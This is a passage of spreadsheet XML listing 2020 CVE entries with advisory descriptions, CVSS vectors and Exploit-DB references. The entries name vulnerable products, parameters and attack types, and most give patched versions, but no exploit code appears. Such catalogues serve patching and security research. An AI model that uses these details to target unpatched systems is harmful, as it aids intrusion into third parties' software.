    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Monitoring-Incidents.php id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15033</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the snmpget.php ip parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15034</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Monitoring-Setup.php tet parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15035</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Monitoring-Map.php hde parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15036</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Topology-Linked.php dv parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15037</t>
  </si>
  <si>
    <t>NeDi 1.9C is vulnerable to cross-site scripting (XSS) attack. The application allows an attacker to execute arbitrary JavaScript code via the Reports-Devices.php page st[] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15038</t>
  </si>
  <si>
    <t>The SeedProd coming-soon plugin before 5.1.1 for WordPress allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-1504</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1494, CVE-2020-1495, CVE-2020-1496, CVE-2020-1498.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48668.txt</t>
  </si>
  <si>
    <t>SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)</t>
  </si>
  <si>
    <t>CVE-2020-15041</t>
  </si>
  <si>
    <t>PHP-Fusion 9.03.60 allows XSS via the administration/site_links.php Add Site Link field.</t>
  </si>
  <si>
    <t>CVE-2020-15043</t>
  </si>
  <si>
    <t>iBall WRB303N devices allow CSRF attacks, as demonstrated by enabling remote management, enabling DHCP, or modifying the subnet range for IP addresses.</t>
  </si>
  <si>
    <t>CVE-2020-15046</t>
  </si>
  <si>
    <t>The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users. The fixed versions are BIOS 3.2 and firmware 03.88.</t>
  </si>
  <si>
    <t>CVE-2020-15047</t>
  </si>
  <si>
    <t>MSA/SMTP.cpp in Trojita before 0.8 ignores certificate-verification errors, which allows man-in-the-middle attackers to spoof SMTP servers.</t>
  </si>
  <si>
    <t>CVE-2020-15049</t>
  </si>
  <si>
    <t>An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing "+\ "-" or an uncommon shell whitespace character prefix to the length field-value.</t>
  </si>
  <si>
    <t>CVE-2020-1505</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka 'Microsoft SharePoint Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48708.txt</t>
  </si>
  <si>
    <t>Bio Star 2.8.2 - Local File Inclusion</t>
  </si>
  <si>
    <t>CVE-2020-15050</t>
  </si>
  <si>
    <t>An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.</t>
  </si>
  <si>
    <t>CVE-2020-15051</t>
  </si>
  <si>
    <t>An issue was discovered in Artica Proxy before 4.30.000000. Stored XSS exists via the Server Domain Name, Your Email Address, Group Name, MYSQL Server, Database, MYSQL Username, Group Name, and Task Description fields.</t>
  </si>
  <si>
    <t>CVE-2020-15052</t>
  </si>
  <si>
    <t>An issue was discovered in Artica Proxy CE before 4.28.030.418. SQL Injection exists via the Netmask, Hostname, and Alias fields.</t>
  </si>
  <si>
    <t>CVE-2020-15053</t>
  </si>
  <si>
    <t>An issue was discovered in Artica Proxy CE before 4.28.030.418. Reflected XSS exists via these search fields: real time request, System Events, Proxy Events, Proxy Objects, and Firewall objects.</t>
  </si>
  <si>
    <t>CVE-2020-15054</t>
  </si>
  <si>
    <t>TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.</t>
  </si>
  <si>
    <t>CVE-2020-15055</t>
  </si>
  <si>
    <t>TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15056</t>
  </si>
  <si>
    <t>TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.</t>
  </si>
  <si>
    <t>CVE-2020-15057</t>
  </si>
  <si>
    <t>TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to denial-of-service the device via long input values.</t>
  </si>
  <si>
    <t>CVE-2020-15058</t>
  </si>
  <si>
    <t>Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.</t>
  </si>
  <si>
    <t>CVE-2020-15059</t>
  </si>
  <si>
    <t>Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1506</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'Windows Start-Up Application Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15060</t>
  </si>
  <si>
    <t>Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.</t>
  </si>
  <si>
    <t>CVE-2020-15061</t>
  </si>
  <si>
    <t>Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to denial-of-service the device via long input values.</t>
  </si>
  <si>
    <t>CVE-2020-15062</t>
  </si>
  <si>
    <t>DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.</t>
  </si>
  <si>
    <t>CVE-2020-15063</t>
  </si>
  <si>
    <t>DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.</t>
  </si>
  <si>
    <t>CVE-2020-15064</t>
  </si>
  <si>
    <t>DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.</t>
  </si>
  <si>
    <t>CVE-2020-15065</t>
  </si>
  <si>
    <t>DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to denial-of-service the device via long input values.</t>
  </si>
  <si>
    <t>CVE-2020-15069</t>
  </si>
  <si>
    <t>Sophos XG Firewall 17.x through v17.5 MR12 allows a Buffer Overflow and remote code execution via the HTTP/S Bookmarks feature for clientless access. Hotfix HF062020.1 was published for all firewalls running v17.x.</t>
  </si>
  <si>
    <t>CVE-2020-1507</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that Microsoft COM for Windows handles objects in memory, aka 'Microsoft COM for Windows Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15070</t>
  </si>
  <si>
    <t>Zulip Server 2.x before 2.1.7 allows eval injection if a privileged attacker were able to write directly to the postgres database, and chose to write a crafted custom profile field value.</t>
  </si>
  <si>
    <t>CVE-2020-15071</t>
  </si>
  <si>
    <t>content/content.blueprintsevents.php in Symphony CMS 3.0.0 allows XSS via fields['name'] to appendSubheading.</t>
  </si>
  <si>
    <t>CVE-2020-15072</t>
  </si>
  <si>
    <t>An issue was discovered in phpList through 3.5.4. An error-based SQL Injection vulnerability exists via the Import Administrators section.</t>
  </si>
  <si>
    <t>CVE-2020-15073</t>
  </si>
  <si>
    <t>An issue was discovered in phpList through 3.5.4. An XSS vulnerability occurs within the Import Administrators section via upload of an edited text document. This also affects the Subscriber Lists section.</t>
  </si>
  <si>
    <t>CVE-2020-15074</t>
  </si>
  <si>
    <t>OpenVPN Access Server older than version 2.8.4 and version 2.9.5 generates new user authentication tokens instead of reusing exiting tokens on reconnect making it possible to circumvent the initial token expiry timestamp.</t>
  </si>
  <si>
    <t>CVE-2020-15075</t>
  </si>
  <si>
    <t>OpenVPN Connect installer for macOS version 3.2.6 and older may corrupt system critical files it should not have access via symlinks in /tmp.</t>
  </si>
  <si>
    <t>CVE-2020-15076</t>
  </si>
  <si>
    <t>Private Tunnel installer for macOS version 3.0.1 and older versions may corrupt system critical files it should not have access via symlinks in /tmp.</t>
  </si>
  <si>
    <t>CVE-2020-15077</t>
  </si>
  <si>
    <t>OpenVPN Access Server 2.8.7 and earlier versions allows a remote attackers to bypass authentication and access control channel data on servers configured with deferred authentication, which can be used to potentially trigger further information leaks.</t>
  </si>
  <si>
    <t>CVE-2020-15078</t>
  </si>
  <si>
    <t>OpenVPN 2.5.1 and earlier versions allows a remote attackers to bypass authentication and access control channel data on servers configured with deferred authentication, which can be used to potentially trigger further information leaks.</t>
  </si>
  <si>
    <t>CVE-2020-15079</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.5.0.0 and before version 1.7.6.6, there is improper access control in Carrier page, Module Manager and Module Positions. The problem is fixed in version 1.7.6.6</t>
  </si>
  <si>
    <t>CVE-2020-1508</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Windows Media Audio Decoder improperly handles objects, aka 'Windows Media Audio Decoder Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1593.</t>
  </si>
  <si>
    <t>CVE-2020-15080</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.7.4.0 and before version 1.7.6.6, some files should not be in the release archive, and others should not be accessible. The problem is fixed in version 1.7.6.6 A possible workaround is to make sure `composer.json` and `docker-compose.yml` are not accessible on your server.</t>
  </si>
  <si>
    <t>CVE-2020-15081</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.5.0.0 and before 1.7.6.6, there is information exposure in the upload directory. The problem is fixed in version 1.7.6.6. A possible workaround is to add an empty index.php file in the upload directory.</t>
  </si>
  <si>
    <t>CVE-2020-15082</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.6.0.1 and before version 1.7.6.6, the dashboard allows rewriting all configuration variables. The problem is fixed in 1.7.6.6</t>
  </si>
  <si>
    <t>CVE-2020-15083</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.7.0.0 and before version 1.7.6.6, if a target sends a corrupted file, it leads to a reflected XSS. The problem is fixed in 1.7.6.6</t>
  </si>
  <si>
    <t>CVE-2020-15084</t>
  </si>
  <si>
    <t>In express-jwt (NPM package) up and including version 5.3.3, the algorithms entry to be specified in the configuration is not being enforced. When algorithms is not specified in the configuration, with the combination of jwks-rsa, it may lead to authorization bypass. You are affected by this vulnerability if all of the following conditions apply: - You are using express-jwt - You do not have **algorithms** configured in your express-jwt configuration. - You are using libraries such as jwks-rsa as the **secret**. You can fix this by specifying **algorithms** in the express-jwt configuration. See linked GHSA for example. This is also fixed in version 6.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-15085</t>
  </si>
  <si>
    <t>In Saleor Storefront before version 2.10.3, request data used to authenticate customers was inadvertently cached in the browser's local storage mechanism, including credentials. A malicious user with direct access to the browser could extract the email and password. In versions prior to 2.10.0 persisted the cache even after the user logged out. This is fixed in version 2.10.3. A workaround is to manually clear application data (browser's local storage) after logging into Saleor Storefront.</t>
  </si>
  <si>
    <t>CVE-2020-15086</t>
  </si>
  <si>
    <t>In TYPO3 installations with the "mediace" extension from version 7.6.2 and before version 7.6.5, it has been discovered that an internal verification mechanism can be used to generate arbitrary checksums. The allows to inject arbitrary data having a valid cryptographic message authentication code and can lead to remote code execution. To successfully exploit this vulnerability, an attacker must have access to at least one `Extbase` plugin or module action in a TYPO3 installation. This is fixed in version 7.6.5 of the "mediace" extension for TYPO3.</t>
  </si>
  <si>
    <t>CVE-2020-15087</t>
  </si>
  <si>
    <t>In Presto before version 337, authenticated users can bypass authorization checks by directly accessing internal APIs. This impacts Presto server installations with secure internal communication configured. This does not affect installations that have not configured secure internal communication, as these installations are inherently insecure. This only affects Presto server installations. This does NOT affect clients such as the CLI or JDBC driver. This vulnerability has been fixed in version 337. Additionally, this issue can be mitigated by blocking network access to internal APIs on the coordinator and workers.</t>
  </si>
  <si>
    <t>CVE-2020-1509</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request, aka 'Local Security Authority Subsystem Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-15091</t>
  </si>
  <si>
    <t>TenderMint from version 0.33.0 and before version 0.33.6 allows block proposers to include signatures for the wrong block. This may happen naturally if you start a network, have it run for some time and restart it (**without changing chainID**). A malicious block proposer (even with a minimal amount of stake) can use this vulnerability to completely halt the network. This issue is fixed in Tendermint 0.33.6 which checks all the signatures are for the block with 2/3+ majority before creating a commit.</t>
  </si>
  <si>
    <t>CVE-2020-15092</t>
  </si>
  <si>
    <t>In TimelineJS before version 3.7.0, some user data renders as HTML. An attacker could implement an XSS exploit with maliciously crafted content in a number of data fields. This risk is present whether the source data for the timeline is stored on Google Sheets or in a JSON configuration file. Most TimelineJS users configure their timeline with a Google Sheets document. Those users are exposed to this vulnerability if they grant write access to the document to a malicious inside attacker, if the access of a trusted user is compromised, or if they grant public write access to the document. Some TimelineJS users configure their timeline with a JSON document. Those users are exposed to this vulnerability if they grant write access to the document to a malicious inside attacker, if the access of a trusted user is compromised, or if write access to the system hosting that document is otherwise compromised. Version 3.7.0 of TimelineJS addresses this in two ways. For content which is intended to support limited HTML markup for styling and linking, that content is "sanitized" before being added to the DOM. For content intended for simple text display, all markup is stripped. Very few users of TimelineJS actually install the TimelineJS code on their server. Most users publish a timeline using a URL hosted on systems we control. The fix for this issue is published to our system such that **those users will automatically begin using the new code**. The only exception would be users who have deliberately edited the embed URL to "pin" their timeline to an earlier version of the code. Some users of TimelineJS use it as a part of a wordpress plugin (knight-lab-timelinejs). Version 3.7.0.0 of that plugin and newer integrate the updated code. Users are encouraged to update the plugin rather than manually update the embedded version of TimelineJS.</t>
  </si>
  <si>
    <t>CVE-2020-15093</t>
  </si>
  <si>
    <t>The tough library (Rust/crates.io) prior to version 0.7.1 does not properly verify the threshold of cryptographic signatures. It allows an attacker to duplicate a valid signature in order to circumvent TUF requiring a minimum threshold of unique signatures before the metadata is considered valid. A fix is available in version 0.7.1. CVE-2020-6174 is assigned to the same vulnerability in the TUF reference implementation.</t>
  </si>
  <si>
    <t>CVE-2020-15094</t>
  </si>
  <si>
    <t>In Symfony before versions 4.4.13 and 5.1.5, the CachingHttpClient class from the HttpClient Symfony component relies on the HttpCache class to handle requests. HttpCache uses internal headers like X-Body-Eval and X-Body-File to control the restoration of cached responses. The class was initially written with surrogate caching and ESI support in mind (all HTTP calls come from a trusted backend in that scenario). But when used by CachingHttpClient and if an attacker can control the response for a request being made by the CachingHttpClient, remote code execution is possible. This has been fixed in versions 4.4.13 and 5.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-15095</t>
  </si>
  <si>
    <t>Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like "&lt;protocol&gt;://[&lt;user&gt;[:&lt;password&gt;]@]&lt;hostname&gt;[:&lt;port&gt;][:][/]&lt;path&gt;". The password value is not redacted and is printed to stdout and also to any generated log files.</t>
  </si>
  <si>
    <t>CVE-2020-15096</t>
  </si>
  <si>
    <t>In Electron before versions 6.1.1, 7.2.4, 8.2.4, and 9.0.0-beta21, there is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions. Apps using "contextIsolation" are affected. There are no app-side workarounds, you must update your Electron version to be protected. This is fixed in versions 6.1.1, 7.2.4, 8.2.4, and 9.0.0-beta21.</t>
  </si>
  <si>
    <t>CVE-2020-15097</t>
  </si>
  <si>
    <t>loklak is an open-source server application which is able to collect messages from various sources, including twitter. The server contains a search index and a peer-to-peer index sharing interface. All messages are stored in an elasticsearch index. In loklak less than or equal to commit 5f48476, a path traversal vulnerability exists. Insufficient input validation in the APIs exposed by the loklak server allowed a directory traversal vulnerability. Any admin configuration and files readable by the app available on the hosted file system can be retrieved by the attacker. Furthermore, user-controlled content could be written to any admin config and files readable by the application. This has been patched in commit 50dd692. Users will need to upgrade their hosted instances of loklak to not be vulnerable to this exploit.</t>
  </si>
  <si>
    <t>CVE-2020-15098</t>
  </si>
  <si>
    <t>In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.20, and greater than or equal to 10.0.0 and less than 10.4.6, it has been discovered that an internal verification mechanism can be used to generate arbitrary checksums. This allows to inject arbitrary data having a valid cryptographic message authentication code (HMAC-SHA1) and can lead to various attack chains including potential privilege escalation, insecure deserialization &amp; remote code execution. The overall severity of this vulnerability is high based on mentioned attack chains and the requirement of having a valid backend user session (authenticated). This has been patched in versions 9.5.20 and 10.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-15099</t>
  </si>
  <si>
    <t>In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.20, and greater than or equal to 10.0.0 and less than 10.4.6, in a case where an attacker manages to generate a valid cryptographic message authentication code (HMAC-SHA1) - either by using a different existing vulnerability or in case the internal encryptionKey was exposed - it is possible to retrieve arbitrary files of a TYPO3 installation. This includes the possibility to fetch typo3conf/LocalConfiguration.php, which again contains the encryptionKey as well as credentials of the database management system being used. In case a database server is directly accessible either via internet or in a shared hosting network, this allows the ability to completely retrieve, manipulate or delete database contents. This includes creating an administration user account - which can be used to trigger remote code execution by injecting custom extensions. This has been patched in versions 9.5.20 and 10.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-1510</t>
  </si>
  <si>
    <t>CVE-2020-15100</t>
  </si>
  <si>
    <t>In freewvs before 0.1.1, a user could create a large file that freewvs will try to read, which will terminate a scan process. This has been patched in 0.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-15101</t>
  </si>
  <si>
    <t>In freewvs before 0.1.1, a directory structure of more than 1000 nested directories can interrupt a freewvs scan due to Python's recursion limit and os.walk(). This can be problematic in a case where an administrator scans the dirs of potentially untrusted users. This has been patched in 0.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-15102</t>
  </si>
  <si>
    <t>In PrestaShop Dashboard Productions before version 2.1.0, there is improper authorization which enables an attacker to change the configuration. The problem is fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-15103</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.1.2, an integer overflow exists due to missing input sanitation in rdpegfx channel. All FreeRDP clients are affected. The input rectangles from the server are not checked against local surface coordinates and blindly accepted. A malicious server can send data that will crash the client later on (invalid length arguments to a `memcpy`) This has been fixed in 2.2.0. As a workaround, stop using command line arguments /gfx, /gfx-h264 and /network:auto</t>
  </si>
  <si>
    <t>CVE-2020-15104</t>
  </si>
  <si>
    <t>In Envoy before versions 1.12.6, 1.13.4, 1.14.4, and 1.15.0 when validating TLS certificates, Envoy would incorrectly allow a wildcard DNS Subject Alternative Name apply to multiple subdomains. For example, with a SAN of *.example.com, Envoy would incorrectly allow nested.subdomain.example.com, when it should only allow subdomain.example.com. This defect applies to both validating a client TLS certificate in mTLS, and validating a server TLS certificate for upstream connections. This vulnerability is only applicable to situations where an untrusted entity can obtain a signed wildcard TLS certificate for a domain of which you only intend to trust a subdomain of. For example, if you intend to trust api.mysubdomain.example.com, and an untrusted actor can obtain a signed TLS certificate for *.example.com or *.com. Configurations are vulnerable if they use verify_subject_alt_name in any Envoy version, or if they use match_subject_alt_names in version 1.14 or later. This issue has been fixed in Envoy versions 1.12.6, 1.13.4, 1.14.4, 1.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-15105</t>
  </si>
  <si>
    <t>Django Two-Factor Authentication before 1.12, stores the user's password in clear text in the user session (base64-encoded). The password is stored in the session when the user submits their username and password, and is removed once they complete authentication by entering a two-factor authentication code. This means that the password is stored in clear text in the session for an arbitrary amount of time, and potentially forever if the user begins the login process by entering their username and password and then leaves before entering their two-factor authentication code. The severity of this issue depends on which type of session storage you have configured: in the worst case, if you're using Django's default database session storage, then users' passwords are stored in clear text in your database. In the best case, if you're using Django's signed cookie session, then users' passwords are only stored in clear text within their browser's cookie store. In the common case of using Django's cache session store, the users' passwords are stored in clear text in whatever cache storage you have configured (typically Memcached or Redis). This has been fixed in 1.12. After upgrading, users should be sure to delete any clear text passwords that have been stored. For example, if you're using the database session backend, you'll likely want to delete any session record from the database and purge that data from any database backups or replicas. In addition, affected organizations who have suffered a database breach while using an affected version should inform their users that their clear text passwords have been compromised. All organizations should encourage users whose passwords were insecurely stored to change these passwords on any sites where they were used. As a workaround, wwitching Django's session storage to use signed cookies instead of the database or cache lessens the impact of this issue, but should not be done without a thorough understanding of the security tradeoffs of using signed cookies rather than a server-side session storage. There is no way to fully mitigate the issue without upgrading.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15106</t>
  </si>
  <si>
    <t>In etcd before versions 3.3.23 and 3.4.10, a large slice causes panic in decodeRecord method. The size of a record is stored in the length field of a WAL file and no additional validation is done on this data. Therefore, it is possible to forge an extremely large frame size that can unintentionally panic at the expense of any RAFT participant trying to decode the WAL.</t>
  </si>
  <si>
    <t>CVE-2020-15107</t>
  </si>
  <si>
    <t>In openenclave before 0.10.0, enclaves that use x87 FPU operations are vulnerable to tampering by a malicious host application. By violating the Linux System V Application Binary Interface (ABI) for such operations, a host app can compromise the execution integrity of some x87 FPU operations in an enclave. Depending on the FPU control configuration of the enclave app and whether the operations are used in secret-dependent execution paths, this vulnerability may also be used to mount a side-channel attack on the enclave. This has been fixed in 0.10.0 and the current master branch. Users will need to recompile their applications against the patched libraries to be protected from this vulnerability.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-15108</t>
  </si>
  <si>
    <t>In glpi before 9.5.1, there is a SQL injection for all usages of "Clone" feature. This has been fixed in 9.5.1.</t>
  </si>
  <si>
    <t>CVE-2020-15109</t>
  </si>
  <si>
    <t>In solidus before versions 2.8.6, 2.9.6, and 2.10.2, there is an bility to change order address without triggering address validations. This vulnerability allows a malicious customer to craft request data with parameters that allow changing the address of the current order without changing the shipment costs associated with the new shipment. All stores with at least two shipping zones and different costs of shipment per zone are impacted. This problem comes from how checkout permitted attributes are structured. We have a single list of attributes that are permitted across the whole checkout, no matter the step that is being submitted. See the linked reference for more information. As a workaround, if it is not possible to upgrade to a supported patched version, please use this gist in the references section.</t>
  </si>
  <si>
    <t>CVE-2020-1511</t>
  </si>
  <si>
    <t>CVE-2020-15110</t>
  </si>
  <si>
    <t>In jupyterhub-kubespawner before 0.12, certain usernames will be able to craft particular server names which will grant them access to the default server of other users who have matching usernames. This has been fixed in 0.12.</t>
  </si>
  <si>
    <t>CVE-2020-15111</t>
  </si>
  <si>
    <t>In Fiber before version 1.12.6, the filename that is given in c.Attachment() (https://docs.gofiber.io/ctx#attachment) is not escaped, and therefore vulnerable for a CRLF injection attack. I.e. an attacker could upload a custom filename and then give the link to the victim. With this filename, the attacker can change the name of the downloaded file, redirect to another site, change the authorization header, etc. A possible workaround is to serialize the input before passing it to ctx.Attachment().</t>
  </si>
  <si>
    <t>CVE-2020-15112</t>
  </si>
  <si>
    <t>In etcd before versions 3.3.23 and 3.4.10, it is possible to have an entry index greater then the number of entries in the ReadAll method in wal/wal.go. This could cause issues when WAL entries are being read during consensus as an arbitrary etcd consensus participant could go down from a runtime panic when reading the entry.</t>
  </si>
  <si>
    <t>CVE-2020-15113</t>
  </si>
  <si>
    <t>In etcd before versions 3.3.23 and 3.4.10, certain directory paths are created (etcd data directory and the directory path when provided to automatically generate self-signed certificates for TLS connections with clients) with restricted access permissions (700) by using the os.MkdirAll. This function does not perform any permission checks when a given directory path exists already. A possible workaround is to ensure the directories have the desired permission (700).</t>
  </si>
  <si>
    <t>CVE-2020-15114</t>
  </si>
  <si>
    <t>In etcd before versions 3.3.23 and 3.4.10, the etcd gateway is a simple TCP proxy to allow for basic service discovery and access. However, it is possible to include the gateway address as an endpoint. This results in a denial of service, since the endpoint can become stuck in a loop of requesting itself until there are no more available file descriptors to accept connections on the gateway.</t>
  </si>
  <si>
    <t>CVE-2020-15115</t>
  </si>
  <si>
    <t>etcd before versions 3.3.23 and 3.4.10 does not perform any password length validation, which allows for very short passwords, such as those with a length of one. This may allow an attacker to guess or brute-force users' passwords with little computational effort.</t>
  </si>
  <si>
    <t>CVE-2020-15117</t>
  </si>
  <si>
    <t>In Synergy before version 1.12.0, a Synergy server can be crashed by receiving a kMsgHelloBack packet with a client name length set to 0xffffffff (4294967295) if the servers memory is less than 4 GB. It was verified that this issue does not cause a crash through the exception handler if the available memory of the Server is more than 4GB.</t>
  </si>
  <si>
    <t>CVE-2020-15118</t>
  </si>
  <si>
    <t>In Wagtail before versions 2.7.4 and 2.9.3, when a form page type is made available to Wagtail editors through the `wagtail.contrib.forms` app, and the page template is built using Django's standard form rendering helpers such as form.as_p, any HTML tags used within a form field's help text will be rendered unescaped in the page. Allowing HTML within help text is an intentional design decision by Django; however, as a matter of policy Wagtail does not allow editors to insert arbitrary HTML by default, as this could potentially be used to carry out cross-site scripting attacks, including privilege escalation. This functionality should therefore not have been made available to editor-level users. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 2.7.4 (for the LTS 2.7 branch) and Wagtail 2.9.3 (for the current 2.9 branch). In these versions, help text will be escaped to prevent the inclusion of HTML tags. Site owners who wish to re-enable the use of HTML within help text (and are willing to accept the risk of this being exploited by editors) may set WAGTAILFORMS_HELP_TEXT_ALLOW_HTML = True in their configuration settings. Site owners who are unable to upgrade to the new versions can secure their form page templates by rendering forms field-by-field as per Django's documentation, but omitting the |safe filter when outputting the help text.</t>
  </si>
  <si>
    <t>CVE-2020-15119</t>
  </si>
  <si>
    <t>In auth0-lock versions before and including 11.25.1, dangerouslySetInnerHTML is used to update the DOM. When dangerouslySetInnerHTML is used, the application and its users might be exposed to cross-site scripting (XSS) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1512</t>
  </si>
  <si>
    <t>CVE-2020-15120</t>
  </si>
  <si>
    <t>In "I hate money" before version 4.1.5, an authenticated member of one project can modify and delete members of another project, without knowledge of this other project's private code. This can be further exploited to access all bills of another project without knowledge of this other project's private code. With the default configuration, anybody is allowed to create a new project. An attacker can create a new project and then use it to become authenticated and exploit this flaw. As such, the exposure is similar to an unauthenticated attack, because it is trivial to become authenticated. This is fixed in version 4.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-15121</t>
  </si>
  <si>
    <t>In radare2 before version 4.5.0, malformed PDB file names in the PDB server path cause shell injection. To trigger the problem it's required to open the executable in radare2 and run idpd to trigger the download. The shell code will execute, and will create a file called pwned in the current directory.</t>
  </si>
  <si>
    <t>CVE-2020-15123</t>
  </si>
  <si>
    <t>In codecov (npm package) before version 3.7.1 the upload method has a command injection vulnerability. Clients of the codecov-node library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability. A similar CVE (CVE-2020-7597 for GHSA-5q88-cjfq-g2mh) was issued but the fix was incomplete. It only blocked &amp;, and command injection is still possible using backticks instead to bypass the sanitizer. The attack surface is low in this case. Particularly in the standard use of codecov, where the module is used directly in a build pipeline, not built against as a library in another application that may supply malicious input and perform command injection.</t>
  </si>
  <si>
    <t>CVE-2020-15124</t>
  </si>
  <si>
    <t>In Goobi Viewer Core before version 4.8.3, a path traversal vulnerability allows for remote attackers to access files on the server via the application. This is limited to files accessible to the application server user, eg. tomcat, but can potentially lead to the disclosure of sensitive information. The vulnerability has been fixed in version 4.8.3</t>
  </si>
  <si>
    <t>CVE-2020-15125</t>
  </si>
  <si>
    <t>In auth0 (npm package) versions before 2.27.1, a DenyList of specific keys that should be sanitized from the request object contained in the error object is used. The key for Authorization header is not sanitized and in certain cases the Authorization header value can be logged exposing a bearer token. You are affected by this vulnerability if you are using the auth0 npm package, and you are using a Machine to Machine application authorized to use Auth0's management API</t>
  </si>
  <si>
    <t>CVE-2020-15126</t>
  </si>
  <si>
    <t>In parser-server from version 3.5.0 and before 4.3.0, an authenticated user using the viewer GraphQL query can by pass all read security on his User object and can also by pass all objects linked via relation or Pointer on his User object.</t>
  </si>
  <si>
    <t>CVE-2020-15127</t>
  </si>
  <si>
